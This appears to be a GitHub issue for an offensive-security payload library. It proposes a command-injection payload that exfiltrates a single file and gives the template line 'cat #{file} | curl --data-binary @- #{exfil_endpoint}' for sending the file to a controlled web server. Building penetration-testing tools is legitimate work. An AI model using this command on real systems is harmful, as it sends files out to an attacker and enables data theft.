Add a command/curl/exfil
payload which exfils a single file using curl
#116
Labels
builtin-payloads
Builtin Payloads
discussion
Topic is open to discussion
feature
New Feature
future
Future idea
Milestone
It would be useful to have a simple command injection payload which exfiltrates a single file using
curl
back to a web server we control and/or start in the payload.cat #{file} | curl --data-binary @- #{exfil_endpoint}
We could use ronin-web-server for the webserver, or possibly write our own super simple HTTP/1.1 parser.
The text was updated successfully, but these errors were encountered: